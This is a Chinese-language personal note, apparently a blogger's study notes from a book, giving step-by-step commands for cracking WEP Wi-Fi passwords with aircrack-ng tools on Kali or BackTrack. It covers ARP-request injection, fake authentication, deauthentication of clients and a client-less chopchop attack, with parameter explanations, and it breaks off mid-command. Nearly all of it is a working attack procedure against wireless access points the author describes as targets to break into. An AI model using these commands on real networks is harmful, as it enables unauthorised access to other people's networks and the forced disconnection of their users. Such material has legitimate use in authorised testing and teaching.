虽然无线破解早就烂大街了,还是去图书馆把这本书补上了,做个笔记,以供以后参考,记得很全面但很乱。测试环境为Kali linux 或backtrack
wep破解
1.将网卡激活成monitor模式
airmon-ng start wlan0 6
2.开始抓取无线数据包:
airodump-ng -w ciw.cap --channel 6 mon0
3.为了加快IV(初始化向量)的获取,可以进行ArpRequest注入式攻击,可以有效提高抓包数量及破解速度:
aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 wlan0
参数解释:
* -3,指的是采取ArpRequest注入攻击方式;
* -b,后面跟上要入侵的AP的MAC地址;
* -h,建议使用,效果会更好,后面跟的是监测到的客户端MAC地址;
* -x num,指的是定义每秒发送数据包数量,这个num值可以根据实际情况调小一些,但一般来说最高1024就可以
4.开启aircrack-ng来进行同步破解:
aircrack-ng -x -f 2 ciw.cap
参数解释:
* -x,是暴力破解模式;
* -f,指启用密码复杂度为2;
1.启动无线网卡的监听模式
$ sudo airmon-ng start wlan0
2. 查看有哪些采用wep加密的路由器,记录目标ap的mac
$ sudo airodump-ng mon0
3. 另开一个终端,运行
$ sudo airodump-ng -c 6 --bssid AP’s MAC -w wep mon0
其中6是AP的信道(channel),AP’sMAC是路由器的MAC地址,wep的是抓下来的数据包保存的文件名
4. 再另开一个终端,与AP建立虚拟连接
$ sudo aireplay-ng -1 0 -a AP’s MAC -h My-MAC mon0
5. 建立虚拟连接成功后,运行下面命令,加速数据获取
$ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My-MAC mon0
6. 收集5000个以上的DATA之后,开始进行解密 。另开一个终端,运行
$ sudo aircrack-ng wep*.cap
如果暂时没算出来的话,继续等,aircrack-ng 会在DATA每增加5000个之后自动再次运行,直到算出密码为止
7. 破解成功后,关闭监控模式
$ sudo airmon-ng stop mon0
自动攻击工具:wep spoonfeeder
Deauth验证攻击,这个对于采用WPA验证的AP攻击都会用到,可以迫使AP重新与客户端进行握手验证,从而使得截获成为可能。命令如下
aireplay-ng -0 10 -a AP's MAC mon0
或者
aireplay-ng -0 10 -a AP's MAC -h Client's MAC mon0
-0指的是采取Deautenticate攻击方式,后面为发送次数,-a后面跟上要入侵的AP的MAC地址,-h建议还是使用,效果会更好,这个后面跟的是监测到的客户端MAC地址
wep破解的多米诺骨牌
1.无客户端chopchop攻击
1.airodump-ng --ivs -c 6 -w file mon0 捕获数据
2.aireplay-ng -l 0 -e AP'ESSID -a AP'MAC -h CLIENT'MAC mon0
FakeAuth:与ap建立虚拟的验证连接,以便之后注入数据包
-h 用于攻击的网卡mac
3.aireplay-ng -4 -b AP'MAC -h CLIENT'MAC mon0
-4 chopchop攻击,生成密钥数据流文件 -h 攻击者自己的mac
生成明文后缀为cap和密钥数据流后缀xor文件
4.tcpdump -s 0 -n -e -r replay_dec.cap
-s 从每个报文截取snaplen字节的数据
-n 不进行ip地址到主机名的转换
-e 在输出行打印数据链路层头部信息
-r 从文件读取包
5.packetforge-ng -0 -a AP'MAC -h CLIENT'